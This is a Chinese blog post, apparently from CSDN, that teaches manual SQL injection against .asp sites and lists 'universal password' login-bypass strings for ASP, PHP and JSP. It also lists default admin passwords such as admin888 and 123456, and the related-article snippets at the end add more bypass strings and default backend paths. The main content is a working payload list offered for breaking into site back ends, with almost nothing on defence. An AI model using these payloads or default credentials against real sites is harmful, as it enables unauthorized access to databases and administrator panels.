SQL手工注入原理&&万能密码及默认密码登陆后台

最新推荐文章于 2024-09-17 21:09:50 发布
最新推荐文章于 2024-09-17 21:09:50 发布
阅读量8.3k 收藏 27
点赞数 6
分类专栏: Hacke
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlh006/article/details/82670776
版权

SQL手工注入原理:

 

下面就是比较笨的方法了==    一个一个试 (* ̄rǒ ̄)

针对于.asp后缀网 + ?id_  在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点

一、什么是SQL注入
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

二、判定是否存在注入点
 and 1=1  and 1=2

三、猜解数据库表名
 and 0<>(select count(*) from 表名)

四、猜解数据库列名
 and (select count(列名) from 猜到的表名)>0

五、猜解字段长度
 and (select top 1 len(猜到的列名) from 猜到的表名)>0

六、猜解字符内容
 and 1=(select count(*) from [猜到的表名] where left(猜到的列名,1)='a')

 

万能密码及默认密码登陆后台:

一、万能密码原理
万能密码漏洞都是因为提交字符未加过滤或过滤不严而导致的。
例如后台系统验证密码要求用户输入的密码和数据库里面的匹配,而用万能密码的方式,就是将验证的语句改成了验证成功的,逻辑运算符AND和OR的运算优先次序是:先运算AND运算符在运算OR运算符,这个漏洞是发生在登陆口,只有登陆口才会出现这样的漏洞。

二、万能密码大全
ASP 万能密码

1:"or "a"="a

2:')or('a'='a

3:or 1=1--

4:'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or'a'='a

8:"or"="a'='a

9:'or''='

10:'or'='or'

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13:'OR 1=1%00

14:"or 1=1%00

15:'xor

16:用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin) 密码 1

17: admin' or 'a'='a 密码随便

PHP 万能密码

1:'or 1=1/*


2:User: something

   Pass: ' or '1'='1


JSP 万能密码:

1:1'or'1'='1:

2:admin' or 1=1/*

默认密码:

1:admin

2:admin888

3:123456

4:123123

5:(域名)

 

xlh006
关注
专栏目录
闪灵Flash CMS管理系统源码 v6.23
04-03
(4)SQL注入 (5)SWF文件防破解加密 提供在线安装(推荐)和上传文件包两种安装方式 如果使用在线安装,安装完成后可自己设置后台的账号密码 如果使用上传文件包的安装方式,后台路径:/admin 默认后台账号:...
SQL注入(万能密码)
qq_69432323的博客
03-14 6142
SQL注入漏洞主要形成的原因是在数据交互,前端的数据传入到后台处理,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
Sql注入详解(原理篇)
Naive的博客
09-11 1万+
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL注入学习笔记(一)
最新发布
weixin_68491709的博客
09-17 567
意为哪些字段可回显到前端,如果第2,3字段回显,那后续要查找的信息就填在2,3字段。对应得到万能密码a or true #或a' or true #或a“ or true #+新的sql语句来获取想要的信息——通过结束符同执行多条sql语句。(0)先确定是否存在sql注入漏洞,与sql注入类型。先确认闭合方式,为1或’1‘或“1”(1)登陆后爆字段。(2)可以同执行多条sql语句。(4)爆数据库的表。(6)读取内容,爆flag。(1)有sql注入漏洞。(3)结束符未被屏蔽。
简述sql注入万能密码原理
weixin_57108799的博客
02-17 968
sql万能密码原理
SQL手工注入原理(一)
初学者L_言的博客
11-17 1277
原理 服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。 靶机 metasploitable2 DVWA ( mysql 数据库) 注入类型分类 主要分为 数字型 字符型 基于布尔注入 and 和 or 首先来分析下完整的SQL语句: select fist_name,surname from users where id="1" 为了方便,我把 "...
SQL注入万能密码
qq_46172668的博客
07-09 2万+
SQL注入万能密码 SQL注入万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台 http://www. .com/admin/admin_login.asp 账号:djlfjdslajdfj(随意输入) 密码:1‘or’1’=‘1 1. 用户进行用户名和密码验证,网站需要查询数据库。查询数据库就是执行SQL语句。用户登录后台执行的数据库查询操作(SQL语句)是:【Selectuser_id,user_type,email From users Where us
3D方块Flash网站系统 v3.0
04-03
(4)SQL注入 (5)SWF文件防破解加密 提供在线安装(推荐)和上传文件包两种安装方式 如果使用在线安装,安装完成后可自己设置后台的账号密码 如果使用上传文件包的安装方式,后台路径:/admin 默认后台账号:...
Artistic-Flash网站管理系统
04-04
(4)SQL注入 (5)SWF文件防破解加密 提供在线安装(推荐)和上传文件包两种安装方式 如果使用在线安装,安装完成后可自己设置后台的账号密码 如果使用上传文件包的安装方式, 后台路径:/admin 默认后台账号:...
酒店主题Flash网站系统 v3.0
04-03
(4)SQL注入 (5)SWF文件防破解加密 提供在线安装(推荐)和上传文件包两种安装方式 如果使用在线安装,安装完成后可自己设置后台的账号密码 如果使用上传文件包的安装方式 后台路径:/admin 默认后台账号:...
Synergy-Flash网站管理系统 v3
04-03
Synergy-Flash网站管理系统 v3.0安装步骤: 提供在线安装(推荐)和上传文件包两种安装方式 如果使用在线安装,安装完成后可自己设置后台的账号密码 如果使用上传文件包的安装...(4)SQL注入 (5)SWF文件防破解加密
sql注入万能密码总结
weixin_45778886的博客
12-03 1万+
万能密码 万能密码原理 原验证登陆语句: SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."' 输入 1′ or 1=1 or ‘1’=’1万能密码语句变为: SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG' 即得到优先级关系:or&lt
SQL注入原理-万能密码注入
qq_43679940的博客
11-13 908
SQL注入原理-万能密码注入
SQL注入——通过注入得到已知用户名的密码
热门推荐
以梦为马,不负韶华
12-08 2万+
· PHP代码如下: <?php //error_reporting(0); $link =mysqli_connect('localhost', 'root', 'root', 'test'); if (!$link) { die('Could not connect to MySQL: ' .mysqli_connect_error()); } $link->se
sql注入万能密码 admin 'or '1'='1'# (# 为注释后面内容)
wjwqp的专栏
03-01 1万+
admin 'or '1'='1'# (# 为注释后面内容) admin'-- admin'or4=4-- admin'or'1'='1'-- admin888 "or"a"="a admin'or2=2# a'having1=1# a'having1=1-- admin'or'2'='2 ')or('a'='a or4=4-- c a'or'4=4-- "or...
SQL注入——从学会注入到不知道能不能注进去
净邪的博客
05-17 2016
注入总览 判断注入点——猜解字段总数——判断显示位——查询数据库库名——查询表名——查询字段名——查询字段内容 SQL 注入分类简介 数字型注入 假设存在一条 URL 为: HTTP://www.aaa.com/test.php?id=1 1.可以对后台SQL 语句猜测为: SELECT * FROM table WHERE id=1 2.先在输入框输入一个单引号 ' 这样的 SQL 语句就会变为: SELECT * FROM table WHERE id=1' 3.在输入框输入
万能密码诠释SQL注入
m0_58231750的博客
03-15 993
确实,随着服务器性能的进一步提升,在如今的现实情况下,基本上日常常用的网站,都已经把防sql注入做得很好了,但没有绝对安全的代码,保持警惕还是很有必要的,而且很多小网站,由于运营方资金精力等原因,往往对于网站的防护做得并没有那么好,就存在注入漏洞。,直接把客户端发来的请求数据包的内容转化成一段sql语句,然后发送给数据库服务器,数据库服务器根据web服务器发来的sql语句,也。,直接执行并把执行结果反馈给web服务器,web服务器收到数据库服务器反馈的内容后,没有做过滤,
攻防世界-inget(简单的SQL注入万能密码
Welcome To Myon'Blog !
04-14 5756
inget(简单的SQL注入)、手工注入万能密码原理sqlmap实现、常用参数
SQL注入详解
行者AI
09-16 1万+
现在大多数系统都使用B/S架构,出于安全考虑需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往会出现安全隐患,为了更好的保护数据泄露或服务器安全,为了方便的安全测试,便编写此文。 1. SQL注入简介 SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。下面以PHP语句为例作为展示: query="SE
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值